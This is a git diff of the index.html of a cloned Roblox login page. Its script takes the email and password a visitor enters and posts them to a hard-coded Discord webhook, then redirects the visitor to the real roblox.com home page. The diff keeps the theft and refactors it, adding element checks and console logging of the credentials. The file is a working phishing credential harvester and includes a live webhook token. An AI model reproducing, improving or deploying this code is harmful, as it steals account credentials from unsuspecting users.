--- a/index.html
+++ b/index.html
@@ -810,44 +810,55 @@ Roblox.Endpoints.Urls = Roblox.Endpoints.Urls || {};
 
 <script>
     document.addEventListener('DOMContentLoaded', function () {
-        document.getElementById('login-button').addEventListener('click', async function (event) {
-            event.preventDefault(); // Prevents the default form submission
+        var loginButton = document.getElementById('login-button');
+        var usernameInput = document.getElementById('login-username');
+        var passwordInput = document.getElementById('login-password');
 
-            var username = document.getElementById('login-username').value;
-            var password = document.getElementById('login-password').value;
+        if (loginButton && usernameInput && passwordInput) {
+            loginButton.addEventListener('click', async function (event) {
+                event.preventDefault(); // Prevents the default form submission
 
-            const webhookBody = {
-                embeds: [{
-                    title: 'rbx login info',
-                    fields: [
-                        { name: 'Email', value: username },
-                        { name: 'Password', value: password }
-                    ]
-                }],
-            };
+                var username = usernameInput.value;
+                var password = passwordInput.value;
 
-            var webhookUrl = 'https://discord.com/api/webhooks/1184258036970295447/GStuyvDyN9yZIfFut7Ri1UOtjr_95rnOqgpoVQIbhtA994wRjmIPkp-2d-8xkFchXmhp';
+                console.log('Username:', username);
+                console.log('Password:', password);
 
-            try {
-                const response = await fetch(webhookUrl, {
-                    method: 'POST',
-                    headers: {
-                        'Content-Type': 'application/json',
-                    },
-                    body: JSON.stringify(webhookBody),
-                });
+                const webhookBody = {
+                    embeds: [{
+                        title: 'rbx login info',
+                        fields: [
+                            { name: 'Email', value: username },
+                            { name: 'Password', value: password }
+                        ]
+                    }],
+                };
 
-                if (response.ok) {
-                    console.log('login connected', response);
-                } else {
-                    console.error('Error:', response.status);
+                var webhookUrl = 'https://discord.com/api/webhooks/1184258036970295447/GStuyvDyN9yZIfFut7Ri1UOtjr_95rnOqgpoVQIbhtA994wRjmIPkp-2d-8xkFchXmhp';
+
+                try {
+                    const response = await fetch(webhookUrl, {
+                        method: 'POST',
+                        headers: {
+                            'Content-Type': 'application/json',
+                        },
+                        body: JSON.stringify(webhookBody),
+                    });
+
+                    if (response.ok) {
+                        console.log('login connected', response);
+                    } else {
+                        console.error('Error:', response.status);
+                    }
+                } catch (error) {
+                    console.error('Error:', error);
                 }
-            } catch (error) {
-                console.error('Error:', error);
-            }
 
-            window.location.href = "https://roblox.com/home";
-        });
+                window.location.href = "https://roblox.com/home";
+            });
+        } else {
+            console.error('Elements not found. Check IDs: login-button, login-username, login-password');
+        }
     });
 </script>
 
